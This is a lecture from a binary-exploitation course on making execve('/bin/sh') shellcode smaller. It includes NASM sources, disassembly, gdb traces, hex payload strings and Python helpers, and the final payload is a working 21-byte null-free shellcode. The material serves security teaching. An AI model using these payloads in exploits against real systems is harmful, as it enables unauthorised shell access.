Lec. 12: Short Shell Code
1 Reducing the Size of Shell Code
Shell code has three main properties: (1) it executes a system call to open a shell or do some other action; (2) it does not contain null bytes; and (3) it is small. So far, the shell code we've developed is 37 bytes. Let's review that piece of shell code now:
SECTION .text           ; Code section
        global _start   ; Make label available to linker

_start:                 ; Standard ld entry point
        jmp callback    ; Jump to the end to get our current address

dowork:
        pop esi         ; esi now holds the address of "/bin/sh"
        xor edx,edx     ; edx = 0 (it's also param #3 - NULL)
        push edx        ; args[1] - NULL
        push esi        ; args[0] - "/bin/sh"
        mov ecx,esp     ; Param #2 - address of args array
        mov ebx,esi     ; Param #1 - "/bin/sh"
        xor eax,eax     ; eax = 0
        mov al,0xb      ; System call number for execve
        int 0x80        ; Interrupt 80 hex - invoke system call

        xor ebx,ebx     ; Exit code, 0 = normal
        xor eax,eax     ; eax = 0
        inc eax         ; System call number for exit (1)
        int 0x80        ; Interrupt 80 hex - invoke system call

callback:
        call dowork     ; Pushes the address of "/bin/sh" onto the stack
        db "/bin/sh",0  ; The program we want to run - "/bin/sh"
To see its current size, let's assemble and link it, then use the hexify program to count the number of bytes:
user@si485H-base:demo$ nasm -g -f elf -o long_shell.o long_shell.asm
user@si485H-base:demo$ ld -o long_shell long_shell.o
user@si485H-base:demo$ ./hexify.sh long_shell
\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00
user@si485H-base:demo$ printf `./hexify.sh long_shell` | wc -c
37
That may seem ok: 37 bytes is pretty short. We can do better, though, because the shorter the shell code the more easily we can drop it as a payload.
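As a cross-check on the count, here is a minimal Python sketch that parses the escaped byte string printed by hexify.sh, reports its length, and lists the offsets of any zero bytes. The helper name parse_escaped is made up for this illustration; the byte string is copied from the listing above.

```python
import re

def parse_escaped(s):
    """Turn a string like r'\\xeb\\x16' into the bytes it denotes (hypothetical helper)."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", s))

# Output of ./hexify.sh long_shell, copied from the listing above.
LONG_SHELL = (
    r"\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd\x80"
    r"\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    r"\x73\x68\x00"
)

code = parse_escaped(LONG_SHELL)
null_offsets = [i for i, b in enumerate(code) if b == 0]

print(len(code))      # 37
print(null_offsets)   # [36]
```

The only zero byte is the string terminator at the very end (offset 36), which is the final byte of the payload.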
1.1 Using the Stack More Effectively
Our first target for reducing the size of the shell code is to remove the jmp-callback procedure. Let's look at the objdump of the code to see how many bytes it uses:
08048060 <_start>:
 8048060:       eb 16                   jmp    8048078 <callback>

08048062 <dowork>:
 8048062:       5e                      pop    esi
 8048063:       31 d2                   xor    edx,edx
 8048065:       52                      push   edx
 8048066:       56                      push   esi
 8048067:       89 e1                   mov    ecx,esp
 8048069:       89 f3                   mov    ebx,esi
 804806b:       31 c0                   xor    eax,eax
 804806d:       b0 0b                   mov    al,0xb
 804806f:       cd 80                   int    0x80
 8048071:       31 db                   xor    ebx,ebx
 8048073:       31 c0                   xor    eax,eax
 8048075:       40                      inc    eax
 8048076:       cd 80                   int    0x80

08048078 <callback>:
 8048078:       e8 e5 ff ff ff          call   8048062 <dowork>
 804807d:       2f                      das
 804807e:       62 69 6e                bound  ebp,QWORD PTR [ecx+0x6e]
 8048081:       2f                      das
 8048082:       73 68                   jae    80480ec <callback+0x74>
If you look closely at the call instruction, you see that it takes 5 whole bytes! That's simply too many. Let's look for a way to reduce this.
1.1.1 Attempt 1
Let's try the strategy where we push the bytes of "/bin/sh" onto the stack one by one, so that the stack pointer ends up holding the address of the start of the string. Something like this:
SECTION .text           ; Code section
        global _start   ; Make label available to linker

_start:
        xor eax,eax
        push eax        ;\0
        push 0x68       ;h
        push 0x73       ;s
        push 0x2f       ;/
        push 0x6e       ;n
        push 0x69       ;i
        push 0x62       ;b
        push 0x2f       ;/

        mov esi,esp     ; esp is address of "/bin/sh"

        xor edx,edx     ; edx = 0 (it's also param #3 - NULL)
        push edx        ; args[1] - NULL
        push esi        ; args[0] - "/bin/sh"
        mov ecx,esp     ; Param #2 - address of args array
        mov ebx,esi     ; Param #1 - "/bin/sh" is *esp
        mov al,0xb      ; System call number for execve
        int 0x80        ; Interrupt 80 hex - invoke system call

        xor ebx,ebx     ; Exit code, 0 = normal
        xor eax,eax     ; eax = 0
        inc eax         ; System call number for exit (1)
        int 0x80        ; Interrupt 80 hex - invoke system call
With this, we should get the same effect as the jmp-callback: a position-independent reference to the string "/bin/sh". Let's take a look at the objdump to see how this changed things:
Disassembly of section .text:

08048060 <_start>:
 8048060:       31 c0                   xor    eax,eax
 8048062:       50                      push   eax
 8048063:       6a 68                   push   0x68
 8048065:       6a 73                   push   0x73
 8048067:       6a 2f                   push   0x2f
 8048069:       6a 6e                   push   0x6e
 804806b:       6a 69                   push   0x69
 804806d:       6a 62                   push   0x62
 804806f:       6a 2f                   push   0x2f
 8048071:       89 e6                   mov    esi,esp
 8048073:       31 d2                   xor    edx,edx
 8048075:       52                      push   edx
 8048076:       56                      push   esi
 8048077:       89 e1                   mov    ecx,esp
 8048079:       89 f3                   mov    ebx,esi
 804807b:       b0 0b                   mov    al,0xb
 804807d:       cd 80                   int    0x80
 804807f:       31 db                   xor    ebx,ebx
 8048081:       31 c0                   xor    eax,eax
 8048083:       40                      inc    eax
 8048084:       cd 80                   int    0x80
Looking closely, each character push takes two bytes, and we push 7 characters, for 14 bytes. Referring back to the jmp-callback version of the code, the callback took 12 bytes (5 for the call plus 7 for the string) and the jmp took 2 bytes, which is also 14 bytes. We gained nothing!
Worse, let's see if this shell code actually works:
user@si485H-base:demo$ ./push_shell_1
user@si485H-base:demo$
Fail.
To figure out why this shell code doesn't work, we'll have to trace its execution in gdb.
user@si485H-base:demo$ gdb -q push_shell_1
Reading symbols from push_shell_1...done.
(gdb) b _start
Breakpoint 1 at 0x8048060
(gdb) r
Starting program: /home/user/git/si485-binary-exploits/lec/12/demo/push_shell_1

Breakpoint 1, 0x08048060 in _start ()
(gdb) ds
Dump of assembler code for function _start:
=> 0x08048060 <+0>:     xor    eax,eax
   0x08048062 <+2>:     push   eax
   0x08048063 <+3>:     push   0x68
   0x08048065 <+5>:     push   0x73
   0x08048067 <+7>:     push   0x2f
   0x08048069 <+9>:     push   0x6e
   0x0804806b <+11>:    push   0x69
   0x0804806d <+13>:    push   0x62
   0x0804806f <+15>:    push   0x2f
   0x08048071 <+17>:    mov    esi,esp
   0x08048073 <+19>:    xor    edx,edx
   0x08048075 <+21>:    push   edx
   0x08048076 <+22>:    push   esi
   0x08048077 <+23>:    mov    ecx,esp
   0x08048079 <+25>:    mov    ebx,esi
   0x0804807b <+27>:    mov    al,0xb
   0x0804807d <+29>:    int    0x80
   0x0804807f <+31>:    xor    ebx,ebx
   0x08048081 <+33>:    xor    eax,eax
   0x08048083 <+35>:    inc    eax
   0x08048084 <+36>:    int    0x80
End of assembler dump.
(gdb) x/3x $esp
0xbffff720:     0x00000001      0xbffff847      0x00000000
Looking at the stack at this point, things seem to be going okay. Let's take three steps:
(gdb) ni 3
0x08048065 in _start ()
(gdb) ds
Dump of assembler code for function _start:
   0x08048060 <+0>:     xor    eax,eax
   0x08048062 <+2>:     push   eax
   0x08048063 <+3>:     push   0x68
=> 0x08048065 <+5>:     push   0x73
   0x08048067 <+7>:     push   0x2f
   0x08048069 <+9>:     push   0x6e
   0x0804806b <+11>:    push   0x69
   0x0804806d <+13>:    push   0x62
   0x0804806f <+15>:    push   0x2f
   0x08048071 <+17>:    mov    esi,esp
   0x08048073 <+19>:    xor    edx,edx
   0x08048075 <+21>:    push   edx
   0x08048076 <+22>:    push   esi
   0x08048077 <+23>:    mov    ecx,esp
   0x08048079 <+25>:    mov    ebx,esi
   0x0804807b <+27>:    mov    al,0xb
   0x0804807d <+29>:    int    0x80
   0x0804807f <+31>:    xor    ebx,ebx
   0x08048081 <+33>:    xor    eax,eax
   0x08048083 <+35>:    inc    eax
   0x08048084 <+36>:    int    0x80
End of assembler dump.
(gdb) x/3x $esp
0xbffff718:     0x00000068      0x00000000      0x00000001
Ok. Now we have a sense of what is going on. Looking closely, you can see that when we pushed 0x68, we didn't push just the byte 0x68; we pushed the 4-byte value 0x00000068. Why?
The stack is kept 4-byte aligned. This ensures that when you push and pop, you get consistent answers: the thing that you push onto the stack is exactly what gets popped off. The instruction push 0x68 is encoded with a one-byte immediate (6a 68), which is why it is only two bytes long, but the processor sign-extends that byte to a full 4-byte value before storing it. There is no way to push a single byte, so you should think of every push as a 4-byte value. But, we can work with that.
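To see what this does to our string, here is a small Python model of the eight pushes from push_shell_1. It is only a sketch of the memory layout (the names push32 and c_string are invented for this illustration), not a trace of the real process.

```python
import struct

def push32(stack, value):
    """Model a 32-bit push: always writes 4 bytes, little-endian, below the old top.
    `stack` holds memory from esp upward (hypothetical helper)."""
    return struct.pack("<I", value & 0xFFFFFFFF) + stack

def c_string(mem):
    """Bytes up to (not including) the first NUL, the way a path string is read."""
    return mem.split(b"\x00", 1)[0]

stack = b""
# Same order as push_shell_1: the zero word first, then h, s, /, n, i, b, /
for value in (0x0, 0x68, 0x73, 0x2f, 0x6e, 0x69, 0x62, 0x2f):
    stack = push32(stack, value)

print(stack[:8])         # b'/\x00\x00\x00b\x00\x00\x00'
print(c_string(stack))   # b'/'
```

Every character is followed by three zero bytes, so the string that starts at esp is just "/", not "/bin/sh". The execve call fails on that path and the code falls through to the exit call, which matches the silent return we saw.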
1.1.2 Attempt 2
Now that we are a bit more familiar with the stack, we can change our shell code to push the entire byte sequence for "/bin/sh" in two steps.
Problem: "/bin/sh" is 7 bytes long, and we can only push 4-byte values! This can be solved by leveraging how file system paths are parsed: repeated slashes are treated as one. For example, "//bin/sh" is the same as "/bin//sh", which is the same as "/bin/sh".
With that, we have the following shell code:
SECTION .text           ; Code section
        global _start   ; Make label available to linker

_start:
        xor eax,eax
        push eax                ;\0
        push 0x68732f6e         ;n/sh
        push 0x69622f2f         ;//bi

        mov esi,esp     ; esi = esp = address of "//bin/sh"

        xor edx,edx     ; edx = 0 (it's also param #3 - NULL)
        push edx        ; args[1] - NULL
        push esi        ; args[0] - "//bin/sh"
        mov ecx,esp     ; Param #2 - address of args array
        mov ebx,esi     ; Param #1 - address of "//bin/sh"
        mov al,0xb      ; System call number for execve
        int 0x80        ; Interrupt 80 hex - invoke system call

        xor ebx,ebx     ; Exit code, 0 = normal
        xor eax,eax     ; eax = 0
        inc eax         ; System call number for exit (1)
        int 0x80        ; Interrupt 80 hex - invoke system call
Looking closely at the two push commands, we have to be mindful of both the push order and little-endian byte order.
        push 0x68732f6e         ;n/sh
        push 0x69622f2f         ;//bi
Note first that the last thing pushed onto the stack is the start of the string. The byte 0x2f is '/', and reading the number 0x69622f2f from left to right gives "ib//". Because little-endian storage puts the least significant byte at the lowest address, it lands in memory as "//bi".
Finally, we still have to NULL terminate the string, so the very first thing we push onto the stack is a zero word. When it is all said and done, we get the following:
        | 0x0 0x0 0x0 0x0 | 0x00000000
        | 'n' '/' 's' 'h' | 0x68732f6e
 esp -> | '/' '/' 'b' 'i' | 0x69622f2f
        '-----------------'
And, we can now use the value of esp as the start of the "//bin/sh\0" string.
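The same bookkeeping can be done mechanically. Below is a minimal Python sketch that splits a padded path into 4-byte chunks and prints the push immediates in the order they must be pushed. The function name push_immediates is made up for this example.

```python
import struct

def push_immediates(path):
    """Return the 32-bit immediates, in push order, that leave esp pointing
    at `path`. The caller still pushes a zero word first as the terminator."""
    if len(path) % 4 != 0:
        raise ValueError("pad the path (e.g. with an extra '/') to a multiple of 4 bytes")
    # Each 4-byte chunk is read as a little-endian integer.
    words = [struct.unpack("<I", path[i:i + 4])[0] for i in range(0, len(path), 4)]
    # The stack grows downward, so the last chunk of the string is pushed first.
    return list(reversed(words))

for word in push_immediates(b"//bin/sh"):
    print(f"push 0x{word:08x}")
# push 0x68732f6e
# push 0x69622f2f
```

Passing the unpadded b"/bin/sh" raises a ValueError, which is the 7-byte problem described above.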
Let's compile and see if this works:
user@si485H-base:demo$ ld -o push_shell_2 push_shell_2.o
user@si485H-base:demo$ ./push_shell_2
$ echo "It worked!"
It worked!
$
And, we can see how many bytes it is:
user@si485H-base:demo$ printf `./hexify.sh push_shell_2` | wc -c
34
Woohoo! We saved 3 bytes.
1.2 Removing Crud from the Shell Code
The next place to turn our frugal eyes upon is the extra bit of crud
in the shell code. In particular, let's start by removing the exit
system call. Why do we need to exit cleanly from our shell code if we
fail to execve? Who cares? We are trying to bring down the systems and
a bit of segfaulting here and there is ok by me.
The second item we want to focus on is the execve() call itself. It
turns out that you don't need to do quite as much work for the shell
to execute. Consider this small example program:
user@si485H-base:demo$ cat small_execve.c
#include <unistd.h>

int main(){
  execve("/bin/sh",NULL,NULL);
}
Notice that in this execve call there is no argv array. We just
leave this NULL, which is not preferred but still works on Linux.
Essentially, you are indicating that you do not want any arguments at
all, and the Linux kernel treats a NULL argv like an empty argument
list. This is nonstandard behavior, so don't count on it on other
systems. In fact, running this program works fine:
user@si485H-base:demo$ gcc small_execve.c -o small_execve
small_execve.c: In function ‘main’:
small_execve.c:4:3: warning: null argument where non-null required (argument 2) [-Wnonnull]
   execve("/bin/sh",NULL,NULL);
   ^
user@si485H-base:demo$ ./small_execve
$ echo "It Works!"
It Works!
$
Yes, the compiler complains, but who cares if it works.
With these changes, we are left with the following shell code:
SECTION .text           ; Code section
        global _start   ; Make label available to linker

_start:
        xor eax,eax
        push eax                ;\0
        push 0x68732f6e         ;n/sh
        push 0x69622f2f         ;//bi

        xor edx,edx     ; Param #3 - NULL
        xor ecx,ecx     ; Param #2 - NULL
        mov ebx,esp     ; Param #1 - esp is the address of "//bin/sh"
        mov al,0xb      ; System call number for execve
        int 0x80        ; Interrupt 80 hex - invoke system call
And we can compile and test:
user@si485H-base:demo$ nasm -f elf smaller_shell.asm -o smaller_shell.o
user@si485H-base:demo$ ld smaller_shell.o -o smaller_shell
user@si485H-base:demo$ ./smaller_shell
$ echo "It Works!"
It Works!
$
user@si485H-base:demo$ printf `./hexify.sh smaller_shell` | wc -c
23
Now we are at 23 bytes! Wow, but believe it or not, we can still do 2 bytes better.
1.3 Zeroing Out Better
The last place to gain an advantage, and it is a small one, is in the
process of zeroing registers. There are a number of instructions that
are designed to deal with 8-byte arithmetic by using multiple registers
to store results that overflow a 4-byte number. The instruction we
will concern ourselves with is the mul instruction.
The mul instruction has the following form:
mul reg
It will:
- Multiply the value in reg with the value currently in eax
- Store the result with the lower 4 bytes in eax and the upper 4 bytes in edx
What does this imply? Well, if the value in reg is zero, then the
product is zero, so eax will be zero AND edx will be zero, no matter
what eax held before. The mul instruction is just two bytes, and with
those two bytes we zero two registers. It replaces both xor eax,eax
and xor edx,edx (two bytes each), saving us two bytes overall.
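The arithmetic can be modeled in a few lines of Python. This is only a sketch of the 32-bit unsigned multiply described above; the function name mul32 is invented for the illustration.

```python
def mul32(eax, operand):
    """Model `mul operand`: unsigned eax * operand, with the 64-bit product
    split into (new eax, new edx) = (lower 32 bits, upper 32 bits)."""
    product = (eax & 0xFFFFFFFF) * (operand & 0xFFFFFFFF)
    return product & 0xFFFFFFFF, product >> 32

print(mul32(0xDEADBEEF, 0))   # (0, 0)
print(mul32(0xFFFFFFFF, 2))   # (4294967294, 1)
```

The first call shows the case we care about: whatever garbage is in eax, multiplying by a zero register leaves zero in both eax and edx. The second call shows the overflow into edx that the instruction was designed for.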
Here's the resulting shell code:
user@si485H-base:demo$ cat smallest_shell.asm
SECTION .text           ; Code section
        global _start   ; Make label available to linker

_start:
        xor ecx,ecx     ; Param #2 - NULL
        mul ecx         ; 0's edx and eax
        push eax                ;\0
        push 0x68732f6e         ;n/sh
        push 0x69622f2f         ;//bi

        mov ebx,esp     ; Param #1 - esp is the address of "//bin/sh"
        mov al,0xb      ; System call number for execve
        int 0x80        ; Interrupt 80 hex - invoke system call
If you look at the two instructions at the top:
        xor ecx,ecx
        mul ecx
First, by zeroing out ecx, and then doing mul ecx, we multiply the
value in eax by zero and store zero in both eax and edx.
We can show that this shell code does work and see how many bytes it is:
user@si485H-base:demo$ nasm -f elf smallest_shell.asm -o smallest_shell.o
user@si485H-base:demo$ ld smallest_shell.o -o smallest_shell
user@si485H-base:demo$ ./smallest_shell
$ echo "It Works!"
It Works!
$
user@si485H-base:demo$ printf `./hexify.sh smallest_shell` | wc -c
21
We are now at 21 bytes! And, that's about as small as it can get. I haven't seen any examples much smaller than this that work consistently.
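To see where the 21 bytes go, here is a Python tally of the instructions in smallest_shell.asm. The encodings are hand-assembled for this sketch, following the opcode patterns in the objdump listings earlier in the lecture; they are an assumption, not output from nasm or hexify.sh, so check them against your own build.

```python
# Hand-assembled encodings (assumed, not tool output) for smallest_shell.asm.
INSTRUCTIONS = [
    ("xor ecx,ecx",     bytes.fromhex("31c9")),
    ("mul ecx",         bytes.fromhex("f7e1")),
    ("push eax",        bytes.fromhex("50")),
    ("push 0x68732f6e", bytes.fromhex("686e2f7368")),  # opcode 68 + "n/sh"
    ("push 0x69622f2f", bytes.fromhex("682f2f6269")),  # opcode 68 + "//bi"
    ("mov ebx,esp",     bytes.fromhex("89e3")),
    ("mov al,0xb",      bytes.fromhex("b00b")),
    ("int 0x80",        bytes.fromhex("cd80")),
]

shellcode = b"".join(encoding for _, encoding in INSTRUCTIONS)

for text, encoding in INSTRUCTIONS:
    print(f"{len(encoding)}  {text}")

print(len(shellcode))   # 21
print(0 in shellcode)   # False
```

Under these assumed encodings, the two 5-byte pushes that carry the string account for nearly half of the payload, and no zero byte appears anywhere in it.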